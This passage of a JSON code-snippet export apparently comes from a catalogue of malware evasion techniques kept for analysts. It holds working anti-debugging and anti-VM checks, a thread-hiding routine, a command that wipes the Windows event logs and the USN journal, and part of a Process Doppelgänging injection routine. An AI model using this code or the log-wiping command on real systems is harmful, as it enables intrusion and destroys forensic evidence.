    ThreadLastSystemCall,\r\n                        ThreadIoPriority,\r\n                        ThreadCycleTime,\r\n                        ThreadPagePriority,\r\n                        ThreadActualBasePriority,\r\n                        ThreadTebInformation,\r\n                        ThreadCSwitchMon,\r\n                        ThreadCSwitchPmu,\r\n                        ThreadWow64Context,\r\n                        ThreadGroupInformation,\r\n                        ThreadUmsInformation,\r\n                        ThreadCounterProfiling,\r\n                        ThreadIdealProcessorEx,\r\n                        ThreadCpuAccountingInformation,\r\n                        ThreadSuspendCount,\r\n             
           ThreadActualGroupAffinity,\r\n                        ThreadDynamicCodePolicyInfo,\r\n                        MaxThreadInfoClass\r\n  );\r\n\r\n  var hNtDll    : THandle;\r\n      AThread   : THandle;\r\n      AThreadId : Cardinal;\r\n\r\n      NtSetInformationThread : function(\r\n                                          ThreadHandle : THandle;\r\n                                          ThreadInformationClass : TThreadInfoClass;\r\n                                          ThreadInformation : PVOID;\r\n                                          ThreadInformationLength : ULONG\r\n                                      ) : NTSTATUS; stdcall;\r\n\r\n  const\r\n    STATUS_SUCCESS = $00000000;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Hide Thread From Debugger\r\n-------------------------------------------------------------------------------}\r\nfunction HideThread(AThreadHandle : THandle) : Boolean;\r\nvar AThreadInformation : ULONG;\r\n    AStatus            : NTSTATUS;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  if not assigned(NtSetInformationThread) then\r\n    Exit();\r\n\r\n\r\n\r\n  // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntsetinformationthread\r\n  AStatus := NtSetInformationThread(AThreadHandle, ThreadHideFromDebugger, nil, 0);\r\n\r\n  case AStatus of\r\n    {\r\n      STATUS_INFO_LENGTH_MISMATCH\r\n    }\r\n    NTSTATUS($C0000004) : begin\r\n      WriteLn('Error: Status Info Length Mismatch.');\r\n    end;\r\n\r\n    {\r\n      STATUS_INVALID_PARAMETER\r\n    }\r\n    NTSTATUS($C000000D) : begin\r\n      WriteLn('Error: Invalid Parameter.');\r\n    end;\r\n\r\n    {\r\n      STATUS_SUCCESS\r\n    }\r\n    NTSTATUS($00000000) : begin\r\n      WriteLn(Format('Thread: %d is now successfully hidden from debuggers.', [AThreadHandle]));\r\n\r\n      result := True;\r\n    end;\r\n\r\n    {\r\n      Other Errors\r\n    }\r\n    else begin\r\n      
WriteLn('Error: Unknown.');\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___thread:example\r\n-------------------------------------------------------------------------------}\r\nprocedure ThreadExample(pParam : PVOID); stdcall;\r\nbegin\r\n  WriteLn('Example Thread Begin.');\r\n\r\n\r\n  {\r\n    If we are attached to a debugger, we trigger a new breakpoint.\r\n\r\n    If thread is set with hidden from debugger, process should crash.\r\n  }\r\n  if IsDebuggerPresent() then begin\r\n    asm\r\n      int 3\r\n    end;\r\n  end;\r\n\r\n  WriteLn('Example Thread Ends.');\r\n\r\n  ///\r\n  ExitThread(0);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    hNtDll := LoadLibrary('NTDLL.DLL');\r\n    if (hNtDll = 0) then\r\n      Exit();\r\n    try\r\n      @NtSetInformationThread := GetProcAddress(hNtDll, 'NtSetInformationThread');\r\n      if NOT Assigned(NtSetInformationThread) then\r\n        Exit();\r\n\r\n      {\r\n        Create an example thread\r\n      }\r\n      SetLastError(0);\r\n\r\n      AThread := CreateThread(nil, 0, @ThreadExample, nil, CREATE_SUSPENDED, AThreadId);\r\n      if (AThread <> 0) then begin\r\n        WriteLn(Format('Example thread created. Thread Handle: %d , Thread Id: %d', [AThread, AThreadid]));\r\n\r\n        HideThread(AThread);\r\n\r\n        ///\r\n        ResumeThread(AThread);\r\n\r\n        WaitForSingleObject(AThread, INFINITE);\r\n      end else begin\r\n        WriteLn(Format('Could not create example thread with error: .', [GetLastError()]));\r\n      end;\r\n    finally\r\n      FreeLibrary(hNtDll);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 29,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/68/?format=api",
            "description": "",
            "plain_code": "//source: https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-processes\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <psapi.h>\r\n\r\n// To ensure correct resolution of symbols, add Psapi.lib to TARGETLIBS\r\n// and compile with -DPSAPI_VERSION=1\r\n\r\nvoid PrintProcessNameAndID( DWORD processID )\r\n{\r\n    TCHAR szProcessName[MAX_PATH] = TEXT(\"<unknown>\");\r\n\r\n    // Get a handle to the process.\r\n\r\n    HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |\r\n                                   PROCESS_VM_READ,\r\n                                   FALSE, processID );\r\n\r\n    // Get the process name.\r\n\r\n    if (NULL != hProcess )\r\n    {\r\n        HMODULE hMod;\r\n        DWORD cbNeeded;\r\n\r\n        if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), \r\n             &cbNeeded) )\r\n        {\r\n            GetModuleBaseName( hProcess, hMod, szProcessName, \r\n                               sizeof(szProcessName)/sizeof(TCHAR) );\r\n        }\r\n    }\r\n\r\n    // Print the process name and identifier.\r\n\r\n    _tprintf( TEXT(\"%s  (PID: %u)\\n\"), szProcessName, processID );\r\n\r\n    // Release the handle to the process.\r\n\r\n    CloseHandle( hProcess );\r\n}\r\n\r\nint main( void )\r\n{\r\n    // Get the list of process identifiers.\r\n\r\n    DWORD aProcesses[1024], cbNeeded, cProcesses;\r\n    unsigned int i;\r\n\r\n    if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )\r\n    {\r\n        return 1;\r\n    }\r\n\r\n\r\n    // Calculate how many process identifiers were returned.\r\n\r\n    cProcesses = cbNeeded / sizeof(DWORD);\r\n\r\n    // Print the name and process identifier for each process.\r\n\r\n    for ( i = 0; i < cProcesses; i++ )\r\n    {\r\n        if( aProcesses[i] != 0 )\r\n        {\r\n            PrintProcessNameAndID( aProcesses[i] );\r\n        }\r\n    }\r\n\r\n    return 0;\r\n}"
        },
        {
            "id": 26,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/25/?format=api",
            "description": "",
            "plain_code": "/*\r\n-----------------------------------------------------------------------------\r\n  * Created by * lallous <lallousx86@yahoo.com> *\r\n  * All rights reserved.\r\n  *\r\n  * Redistribution and use in source and binary forms, with or without\r\n  * modification, are permitted provided that the following conditions\r\n  * are met:\r\n  * 1. Redistributions of source code must retain the above copyright\r\n  *    notice, this list of conditions and the following disclaimer.\r\n  *\r\n  * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS''\r\nAND\r\n  * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\n  * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\r\nPURPOSE\r\n  * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE\r\nLIABLE\r\n  * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\r\nCONSEQUENTIAL\r\n  * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\r\nGOODS\r\n  * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\r\n  * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\r\nSTRICT\r\n  * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\r\nWAY\r\n  * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY\r\nOF\r\n  * SUCH DAMAGE.\r\n  *\r\n-----------------------------------------------------------------------------\r\n*/\r\n\r\n// IsInsideVPC's exception filter\r\nDWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep)\r\n{\r\n   PCONTEXT ctx = ep->ContextRecord;\r\n\r\n   ctx->Ebx = -1; // Not running VPC\r\n   ctx->Eip += 4; // skip past the \"call VPC\" opcodes\r\n   return EXCEPTION_CONTINUE_EXECUTION;\r\n   // we can safely resume execution since we skipped faulty instruction\r\n}\r\n\r\n// high level language friendly version of IsInsideVPC()\r\nbool IsInsideVPC()\r\n{\r\n   bool rc = false;\r\n\r\n   __try\r\n   {\r\n     _asm push 
ebx\r\n     _asm mov  ebx, 0 // Flag\r\n     _asm mov  eax, 1 // VPC function number\r\n\r\n     // call VPC\r\n     _asm __emit 0Fh\r\n     _asm __emit 3Fh\r\n     _asm __emit 07h\r\n     _asm __emit 0Bh\r\n\r\n     _asm test ebx, ebx\r\n     _asm setz [rc]\r\n     _asm pop ebx\r\n   }\r\n   // The except block shouldn't get triggered if VPC is running!!\r\n   __except(IsInsideVPC_exceptionFilter(GetExceptionInformation()))\r\n   {\r\n   }\r\n\r\n   return rc;\r\n}"
        },
        {
            "id": 22,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/52/?format=api",
            "description": "",
            "plain_code": "#include <windows.h>\r\n#include <stdio.h>\r\n\r\nint main(int argc, char** argv)\r\n{\r\n\tif (IsDebuggerPresent())\r\n\t{\r\n            printf(\"Debugger detected!!\\n\");\r\n\t}\r\n\telse\r\n\t{\r\n\t    printf(\"No debugger detected!!\\n\");\r\n\t}\r\n\tsystem(\"pause\");\r\n\treturn 0;\r\n}"
        },
        {
            "id": 23,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/57/?format=api",
            "description": "",
            "plain_code": "#include <stdio.h>\r\n#include <Windows.h>\r\n\r\nint main()\r\n{\r\n\tSetLastError(0);\r\n\t\r\n        // Send string to the debugger\r\n\tOutputDebugStringA(\"Hello friend\");\r\n\r\n\tif (GetLastError() != 0)\r\n\t{\r\n\t\tprintf(\"Debugger detected!!\\n\");\r\n\t}\r\n        system(\"pause\");\r\n\treturn 0;\r\n}"
        },
        {
            "id": 24,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/52/?format=api",
            "description": "",
            "plain_code": "program IsDebuggerPresent;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils;\r\n\r\nbegin\r\n  try\r\n    if IsDebuggerPresent() then\r\n      WriteLn('Process is currently getting debugged.')\r\n    else\r\n      WriteLn('Process is not likely getting debugged.');\r\n\r\n    readln;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 25,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/107/?format=api",
            "description": "",
            "plain_code": "program NtSetDebugFilterState;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils;\r\n\r\nvar\r\n  NtSetDebugFilterState : function(AComponentId : ULONG; ALevel : ULONG; AState : Boolean) : NTSTATUS; stdcall;\r\n\r\n  hNTDLL  : THandle;\r\n  AStatus : NTSTATUS;\r\n\r\nbegin\r\n  try\r\n    hNTDLL := LoadLibrary('ntdll.dll');\r\n    if (hNTDLL = 0) then\r\n      Exit();\r\n    try\r\n      @NtSetDebugFilterState := GetProcAddress(hNTDLL, 'NtSetDebugFilterState');\r\n\r\n      if NOT Assigned(NtSetDebugFilterState) then\r\n        Exit();\r\n\r\n      AStatus := NtSetDebugFilterState(0, 0, True);\r\n\r\n      writeln(AStatus);\r\n\r\n      if (AStatus <> 0) then\r\n        WriteLn('Not Debugged.')\r\n      else\r\n        WriteLn('Debugged.');\r\n    finally\r\n      FreeLibrary(hNTDLL);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 21,
            "language": {
                "id": 7,
                "label": "cmd",
                "code_class": "cmd"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/133/?format=api",
            "description": "Common commands found in malware.",
            "plain_code": "wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:"
        },
        {
            "id": 18,
            "language": {
                "id": 4,
                "label": "Golang",
                "code_class": "golang"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/8/?format=api",
            "description": "",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"fmt\"\r\n    \"log\"\r\n    \"net\"\r\n    \"strings\"\r\n)\r\n\r\nfunc getMacAddr() ([]string, error) {\r\n    ifas, err := net.Interfaces()\r\n    if err != nil {\r\n        return nil, err\r\n    }\r\n    var as []string\r\n    for _, ifa := range ifas {\r\n        a := ifa.HardwareAddr.String()\r\n        if a != \"\" {\r\n            as = append(as, a)\r\n        }\r\n    }\r\n    return as, nil\r\n}\r\n\r\nfunc main() {\r\n    // Blacklist VM mac address\r\n    var macvm = []string{\"08:00:27\", \"00:0C:29\", \"00:1C:14\", \"00:50:56\", \"00:05:69\"}\r\n\r\n    as, err := getMacAddr()\r\n    if err != nil {\r\n        log.Fatal(err)\r\n    }\r\n\r\n    for i, s:= range macvm {\r\n        for _, a := range as {\r\n            str := strings.ToUpper(a)\r\n            if str[0:8] == s[0:8] {\r\n                fmt.Println(\"VM detected!\")\r\n\t\tfmt.Println(i, s)\r\n            } \r\n         }\r\n    }\r\n}"
        },
        {
            "id": 19,
            "language": {
                "id": 6,
                "label": "MASM",
                "code_class": "x86asm"
            },
            "user": {
                "id": 7,
                "username": "Adam",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/Hexacorn",
                "website": "https://www.hexacorn.com/",
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/148/?format=api",
            "description": "",
            "plain_code": ".586\r\n.MODEL FLAT,STDCALL\r\n include    windows.inc\r\n include    kernel32.inc\r\n includelib kernel32.lib\r\n include    user32.inc\r\n includelib user32.lib\r\n include    masm32.inc\r\n includelib masm32.lib\r\n.data\r\n  pat                  db 'rdtscp delta=%d, rdtsc delta=%d',13,10,0\r\n  rdtscp_not_supported db 'rdtscp not supported'\r\n.data?\r\n  buf db 64 dup (?)\r\n.code\r\nrdtscp macro\r\n  db 0Fh, 01h, 0F9h\r\nendm\r\nassume fs:nothing\r\nRDTSCP  proc\r\n  LOCAL _retval:DWORD\r\n   mov  _retval,0\r\n   pushad\r\n   push OFFSET e\r\n   push dword ptr fs:[0]\r\n   mov  dword ptr fs:[0], esp\r\n   rdtscp\r\n   mov ebx,eax\r\n   rdtscp\r\n   sub  eax,ebx\r\n   mov  _retval,eax\r\n   jmp  no_e\r\n e:\r\n   mov  esp, [esp + 8]\r\n   pop  dword ptr fs:[0]\r\n   add  esp, 4\r\n   popad\r\n   mov  _retval,-1\r\n   jmp  _ret\r\n no_e:\r\n   pop  dword ptr fs:[0]\r\n   add  esp, 4\r\n   popad\r\n_ret:\r\n   mov eax,_retval\r\n   ret\r\nRDTSCP  endp\r\n  Start:\r\n   rdtsc\r\n   mov ebx,eax\r\n   rdtsc\r\n   sub  eax,ebx\r\n   mov  ebp,eax\r\n   call RDTSCP\r\n   .if eax==-1\r\n       invoke  StdOut,OFFSET rdtscp_not_supported\r\n   .else\r\n       invoke  wsprintfA,OFFSET buf,OFFSET pat,eax,ebp\r\n       invoke  StdOut,OFFSET buf\r\n   .endif\r\n   invoke ExitProcess,0\r\nEND Start"
        },
        {
            "id": 20,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/57/?format=api",
            "description": "",
            "plain_code": "program OutputDebugString;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows,\r\n  System.SysUtils;\r\n\r\nvar AErrorValue : Byte;\r\n\r\nbegin\r\n  try\r\n    randomize;\r\n\r\n    AErrorValue := Random(High(Byte));\r\n\r\n    SetLastError(AErrorValue);\r\n\r\n    OutputDebugStringW('TEST');\r\n\r\n    if (GetLastError() = AErrorValue) then\r\n      WriteLn('Debugger detected using OutputDebugString() technique.')\r\n    else\r\n      WriteLn('No debugger detected using OutputDebugString() technique.');\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 17,
            "language": {
                "id": 4,
                "label": "Golang",
                "code_class": "golang"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/97/?format=api",
            "description": "",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc cipher(text string, direction int) string {\r\n\r\n        shift, offset := rune(3), rune(26)\r\n\trunes := []rune(text)\r\n\r\n        for index, char := range runes {\r\n\t\tswitch direction {\r\n\t\tcase -1: // encoding\r\n\t\t\tif char >= 'a'+shift && char <= 'z' ||\r\n\t\t\t\tchar >= 'A'+shift && char <= 'Z' {\r\n\t\t\t\tchar = char - shift\r\n\t\t\t} else if char >= 'a' && char < 'a'+shift ||\r\n\t\t\t\tchar >= 'A' && char < 'A'+shift {\r\n\t\t\t\tchar = char - shift + offset\r\n\t\t\t}\r\n\t\tcase +1: // decoding\r\n\t\t\tif char >= 'a' && char <= 'z'-shift ||\r\n\t\t\t\tchar >= 'A' && char <= 'Z'-shift {\r\n\t\t\t\tchar = char + shift\r\n\t\t\t} else if char > 'z'-shift && char <= 'z' ||\r\n\t\t\t\tchar > 'Z'-shift && char <= 'Z' {\r\n\t\t\t\tchar = char + shift - offset\r\n\t\t\t}\r\n\t\t}\r\n\t\trunes[index] = char\r\n\t}\r\n\treturn string(runes)\r\n}\r\n\r\nfunc encode(text string) string { return cipher(text, -1) }\r\nfunc decode(text string) string { return cipher(text, +1) }\r\n\r\nfunc main() {\r\n\tsec := os.Args[1]\r\n        fmt.Println(\"[+] Clear text: \" + sec)\r\n\tencoded := encode(sec)\r\n\tfmt.Println(\"[+] Encoded: \" + encoded)\r\n\tdecoded := decode(encoded)\r\n\tfmt.Println(\"[+] Decoded: \" + decoded)\r\n}"
        },
        {
            "id": 16,
            "language": {
                "id": 4,
                "label": "Golang",
                "code_class": "golang"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/96/?format=api",
            "description": "This Go program uses the Base64 encoding scheme to encode and decode a string. The program takes a single command line argument, which is the string to be encoded and decoded. The program first uses the base64 package to encode the string using the Standard encoding alphabet. The encoded string is then printed to the screen. The program then decodes the encoded string using the same alphabet, and prints the resulting decoded string to the screen. This example demonstrates how the Base64 encoding scheme can be used to encode and decode binary data in a compact and easily transmitted format. In the context of malware, this technique can be used to conceal payloads or encode network communication in order to avoid detection and analysis.",
            "plain_code": "package main\r\n\r\nimport (\r\n    \"encoding/base64\"\r\n    \"fmt\"\r\n    \"os\"\r\n)\r\n\r\nfunc main() {\r\n\r\n    arg1 := os.Args[1]\r\n\r\n    encoded := base64.StdEncoding.EncodeToString([]byte(arg1))\r\n    fmt.Println(encoded)\r\n\r\n    decoded, err := base64.StdEncoding.DecodeString(encoded)\r\n    if err != nil {\r\n        panic(\"error\")\r\n    }\r\n    fmt.Println(string(decoded))\r\n}"
        },
        {
            "id": 13,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 19,
                "username": "External",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": null,
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/119/?format=api",
            "description": "The code demonstrates Process Doppelgänging, a technique that leverages Windows Transactional NTFS to overwrite a legitimate file with a malicious file inside an NTFS transaction that is then rolled back, resulting in process injection.",
            "plain_code": "// Ref = src\r\n// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\r\n//\r\n// Credits:\r\n//  Vyacheslav Rusakov @swwwolf\r\n//  Tom Bonner @thomas_bonner\r\n//\r\n\r\n#include <Windows.h>\r\n#include <ntstatus.h>\r\n#include \"ntos.h\"\r\n\r\nVOID ProcessDoppelgänging(\r\n    _In_ LPWSTR lpTargetApp,\r\n    _In_ LPWSTR lpPayloadApp)\r\n{\r\n    BOOL bCond = FALSE;\r\n    NTSTATUS status;\r\n    HANDLE hTransaction = NULL, hTransactedFile = INVALID_HANDLE_VALUE, hFile = INVALID_HANDLE_VALUE;\r\n    HANDLE hSection = NULL, hProcess = NULL, hThread = NULL;\r\n    LARGE_INTEGER fsz;\r\n    ULONG ReturnLength = 0;\r\n    ULONG_PTR EntryPoint = 0, ImageBase = 0;\r\n    PVOID Buffer = NULL, MemoryPtr = NULL;\r\n    SIZE_T sz = 0;\r\n    PEB *Peb;\r\n\r\n    PROCESS_BASIC_INFORMATION pbi;\r\n\r\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;\r\n\r\n    OBJECT_ATTRIBUTES obja;\r\n    UNICODE_STRING    ustr;\r\n\r\n    BYTE temp[0x1000];\r\n\r\n    do {\r\n        RtlSecureZeroMemory(&temp, sizeof(temp));\r\n\r\n        //\r\n        // Create TmTx transaction object.\r\n        //\r\n        InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\r\n        status = NtCreateTransaction(&hTransaction,\r\n            TRANSACTION_ALL_ACCESS,\r\n            &obja,\r\n            NULL,\r\n            NULL,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateTransaction fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open target file for transaction.\r\n        //\r\n        hTransactedFile = CreateFileTransacted(lpTargetApp,\r\n            GENERIC_WRITE | GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL,\r\n            
hTransaction,\r\n            NULL,\r\n            NULL);\r\n\r\n        if (hTransactedFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFileTransacted fail\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Open file payload.\r\n        //\r\n        hFile = CreateFile(lpPayloadApp,\r\n            GENERIC_READ,\r\n            0,\r\n            NULL,\r\n            OPEN_EXISTING,\r\n            FILE_ATTRIBUTE_NORMAL,\r\n            NULL);\r\n        if (hFile == INVALID_HANDLE_VALUE) {\r\n            OutputDebugString(L\"CreateFile(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file size.\r\n        //\r\n        if (!GetFileSizeEx(hFile, &fsz)) {\r\n            OutputDebugString(L\"GetFileSizeEx(target) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate buffer for payload file.\r\n        //\r\n        Buffer = NULL;\r\n        sz = (SIZE_T)fsz.LowPart;\r\n        status = NtAllocateVirtualMemory(NtCurrentProcess(),\r\n            &Buffer,\r\n            0,\r\n            &sz,\r\n            MEM_COMMIT | MEM_RESERVE,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(fsz.LowPart) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Read payload file to the buffer.\r\n        //\r\n        if (!ReadFile(hFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"ReadFile(hFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        CloseHandle(hFile);\r\n        hFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Write buffer into transaction.\r\n        //\r\n        if (!WriteFile(hTransactedFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n            OutputDebugString(L\"WriteFile(hTransactedFile, Buffer) failed\");\r\n            break;\r\n        }\r\n\r\n        
//\r\n        // Create section from transacted file.\r\n        //\r\n        status = NtCreateSection(&hSection,\r\n            SECTION_ALL_ACCESS,\r\n            NULL,\r\n            0,\r\n            PAGE_READONLY,\r\n            SEC_IMAGE,\r\n            hTransactedFile);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateSection(hTransactedFile) failed\");\r\n            break;\r\n        }\r\n\r\n        status = NtRollbackTransaction(hTransaction, TRUE);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtRollbackTransaction(hTransaction) failed\");\r\n            break;\r\n        }\r\n\r\n        NtClose(hTransaction);\r\n        hTransaction = NULL;\r\n\r\n        CloseHandle(hTransactedFile);\r\n        hTransactedFile = INVALID_HANDLE_VALUE;\r\n\r\n        //\r\n        // Create process object with transacted section.\r\n        //\r\n        //\r\n        // Warning: due to MS brilliant coding skills (NULL ptr dereference) \r\n        //          this call will trigger BSOD on Windows 10 prior to RS3.\r\n        //\r\n        hProcess = NULL;\r\n        status = NtCreateProcessEx(&hProcess,\r\n            PROCESS_ALL_ACCESS,\r\n            NULL,\r\n            NtCurrentProcess(),\r\n            PS_INHERIT_HANDLES,\r\n            hSection,\r\n            NULL,\r\n            NULL,\r\n            FALSE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateProcessEx(hSection) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Query payload file entry point value.\r\n        //\r\n        status = NtQueryInformationProcess(hProcess,\r\n            ProcessBasicInformation,\r\n            &pbi,\r\n            sizeof(PROCESS_BASIC_INFORMATION),\r\n            &ReturnLength);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtQueryInformationProcess failed\");\r\n            break;\r\n        }\r\n\r\n        status 
